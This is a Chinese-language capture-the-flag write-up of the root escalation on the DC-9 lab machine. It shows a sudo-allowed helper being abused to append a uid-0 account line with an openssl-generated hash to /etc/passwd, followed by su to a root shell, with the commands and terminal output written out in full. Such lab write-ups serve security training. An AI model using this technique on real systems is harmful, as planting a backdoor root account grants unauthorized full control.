Matching Defaults entries for fredf on dc-9:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fredf may run the following commands on dc-9:
    (root) NOPASSWD: /opt/devstuff/dist/test/test

跳转到该目录

fredf@dc-9:/opt/devstuff/dist/test$ ls -al
total 12796
drwxr-xr-x 2 root root    4096 Dec 29  2019 .
drwxr-xr-x 3 root root    4096 Dec 29  2019 ..
-rw-r--r-- 1 root root  779676 Dec 29  2019 base_library.zip
-rwxr-xr-x 1 root root   26136 Apr  3  2019 _bz2.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root  153904 Apr  3  2019 _codecs_cn.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root  158032 Apr  3  2019 _codecs_hk.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root   31024 Apr  3  2019 _codecs_iso2022.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root  272688 Apr  3  2019 _codecs_jp.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root  141616 Apr  3  2019 _codecs_kr.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root  112944 Apr  3  2019 _codecs_tw.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root   34008 Apr  3  2019 _hashlib.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root   74688 Jul 11  2019 libbz2.so.1.0
-rwxr-xr-x 1 root root 3031904 Oct 13  2019 libcrypto.so.1.1
-rwxr-xr-x 1 root root  243840 Sep 20  2019 libexpat.so.1
-rwxr-xr-x 1 root root  158400 Jan 28  2019 liblzma.so.5
-rwxr-xr-x 1 root root 5080176 Apr  3  2019 libpython3.7m.so.1.0
-rwxr-xr-x 1 root root  309096 May  6  2018 libreadline.so.7
-rwxr-xr-x 1 root root  593696 Oct 13  2019 libssl.so.1.1
-rwxr-xr-x 1 root root  183528 Aug  6  2019 libtinfo.so.6
-rwxr-xr-x 1 root root  121280 Sep 26  2017 libz.so.1
-rwxr-xr-x 1 root root   37688 Apr  3  2019 _lzma.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root   64792 Apr  3  2019 _multibytecodec.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root   14632 Apr  3  2019 _opcode.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root   39944 Apr  3  2019 readline.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root   19752 Apr  3  2019 resource.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root  116568 Apr  3  2019 _ssl.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root   29064 Apr  3  2019 termios.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root 1212968 Dec 29  2019 test

准备提权

回退到前面目录发现python脚本

fredf@dc-9:/opt/devstuff/dist/test$ cd ..
fredf@dc-9:/opt/devstuff/dist$ ls
test
fredf@dc-9:/opt/devstuff/dist$ ls -al
total 12
drwxr-xr-x 3 root root 4096 Dec 29  2019 .
drwxr-xr-x 5 root root 4096 Dec 29  2019 ..
drwxr-xr-x 2 root root 4096 Dec 29  2019 test
fredf@dc-9:/opt/devstuff/dist$ cd ..
fredf@dc-9:/opt/devstuff$ ls
build  dist  __pycache__  test.py  test.spec
fredf@dc-9:/opt/devstuff$

查看一下内容，生成一个密码用root权限执行脚本写入/etc/passwd文件，所以我们现在就需要构造一个拥有root权限的用户，并且在/etc/passwd文件中储存，只要使用这个用户登录后，就可以获取到root权限

fredf@dc-9:/opt/devstuff$ cat test.py
#!/usr/bin/python

import sys

if len (sys.argv) != 3 :
    print ("Usage: python test.py read append")
    sys.exit (1)

else :
    f = open(sys.argv[1], "r")
    output = (f.read())

    f = open(sys.argv[2], "a")
    f.write(output)
    f.close()

回到kali，使用openssl工具创建一个本地的加密用户，命令openssl passwd -1 -salt admin admin

回到靶机

然后回到靶机，跳转到/opt/devstuff/dist/test目录

使用echo命令在/tmp目录下创建一个文件，命令

echo 'admin:$1$admin$1kgWpnZpUx.vTroWPXPIB0:0:0::/root:/bin/bash' >> /tmp/test1

然后使用命令

sudo ./test /tmp/test1 /etc/passwd

使用sudo命令执行test文件将/tmp/test1的内容写入到/etc/passwd文件中

我这里试了好几次，不知道什么原因，最后admin2成功了，有师傅懂的欢迎交流

┌──(root㉿kali)-[~]
└─# ssh fredf@192.168.100.22
fredf@192.168.100.22's password:
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Feb  1 13:28:27 2024 from 192.168.100.251
fredf@dc-9:~$ cd /opt/devstuff/dist/test
fredf@dc-9:/opt/devstuff/dist/test$ ls
base_library.zip                                 libpython3.7m.so.1.0
_bz2.cpython-37m-x86_64-linux-gnu.so             libreadline.so.7
_codecs_cn.cpython-37m-x86_64-linux-gnu.so       libssl.so.1.1
_codecs_hk.cpython-37m-x86_64-linux-gnu.so       libtinfo.so.6
_codecs_iso2022.cpython-37m-x86_64-linux-gnu.so  libz.so.1
_codecs_jp.cpython-37m-x86_64-linux-gnu.so       _lzma.cpython-37m-x86_64-linux-gnu.so
_codecs_kr.cpython-37m-x86_64-linux-gnu.so       _multibytecodec.cpython-37m-x86_64-linux-gnu.so
_codecs_tw.cpython-37m-x86_64-linux-gnu.so       _opcode.cpython-37m-x86_64-linux-gnu.so
_hashlib.cpython-37m-x86_64-linux-gnu.so         readline.cpython-37m-x86_64-linux-gnu.so
libbz2.so.1.0                                    resource.cpython-37m-x86_64-linux-gnu.so
libcrypto.so.1.1                                 _ssl.cpython-37m-x86_64-linux-gnu.so
libexpat.so.1                                    termios.cpython-37m-x86_64-linux-gnu.so
liblzma.so.5                                     test
fredf@dc-9:/opt/devstuff/dist/test$ echo 'admin2:$1$admin2$Pr1254RlLuWxoieYEI.Sa0:0:0::/root:/bin/bash' >> /tmp/test1
fredf@dc-9:/opt/devstuff/dist/test$ sudo ./test /tmp/test1 /etc/passwd
fredf@dc-9:/opt/devstuff/dist/test$ su admin2
Password:
root@dc-9:/opt/devstuff/dist/test#

成功！flag就在root目录下